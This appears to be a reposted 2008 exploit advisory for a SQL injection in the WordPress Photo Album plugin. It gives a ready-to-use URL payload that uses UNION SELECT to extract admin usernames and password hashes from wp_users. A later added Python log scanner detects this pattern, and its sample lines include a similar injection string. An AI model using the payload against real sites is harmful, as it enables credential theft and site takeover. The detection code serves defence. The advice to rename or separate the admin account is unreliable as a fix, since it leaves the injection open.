Wordpress Photo album Remote SQL Injection Vulnerability

February 18th, 2008

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOIT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection
# AUTHOR : S@BUN
# HOME 1 : http://www.milw0rm.com/author/1334
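It is recommended to change the admin user's privileges and create a separate administrator account that is not used for publishing posts, or to go directly into the database and rename admin to something else.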
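A defender-side check for the request pattern in the advisory above, as an added example (not code from the advisory or the plugin): it scans access-log lines for `album`/`photo` values that decode to a UNION SELECT or reference `wp_users`. The log format, the sample lines, and the assumption that legitimate values are short IDs or slugs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

WATCHED = {"album", "photo"}  # injection points named in the advisory
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
CRED_COLUMNS = re.compile(r"\b(?:wp_users|user_login|user_pass)\b", re.I)

def normalize(value):
    """Undo nested URL encoding, then replace SQL comments with spaces."""
    for _ in range(3):
        value = unquote(value)
    return SQL_COMMENT.sub(" ", value)

def inspect(line):
    """Return (client, param, reasons) findings for one access-log line."""
    match = REQUEST.match(line)
    if not match:
        return []
    client, target = match.groups()
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in WATCHED:
            continue
        value = normalize(raw)
        reasons = []
        if UNION_SELECT.search(value):
            reasons.append("union-select")
        if CRED_COLUMNS.search(value):
            reasons.append("wp_users-reference")
        # Assumption: legitimate values are short numeric IDs or slugs.
        if not re.fullmatch(r"[\w-]{1,64}", value):
            reasons.append("unexpected-characters")
        if reasons:
            findings.append((client, name, reasons))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2008:10:00:00 +0000] "GET /?page_id=13&album=2&photo=7 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [18/Feb/2008:10:00:02 +0000] "GET /?page_id=13&album=summer-2007 HTTP/1.1" 200 4810',
    '198.51.100.7 - - [18/Feb/2008:10:00:05 +0000] "GET /?page_id=13&album=1&photo=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/user_login/**/from/**/wp_users HTTP/1.1" 200 5342',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry))
```

The comment-stripping step matters here because the request in the advisory uses `/**/` (partly URL-encoded) in place of spaces, which a plain `union select` string match would miss.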


When reposting original articles, please credit the source: Lin's Space|Only [http://clin003.com]

Permalink: http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/


  1. wiki
    February 18th, 2008 at 23:56 | #1

    This plugin is designed to easily manage and display your photo albums within your WordPress site. Plugin Admin Features: You can find the plugin admin section under Manage then submenu Photos. Manage and create albums. Move photos to and from albums. Upload and delete photos.
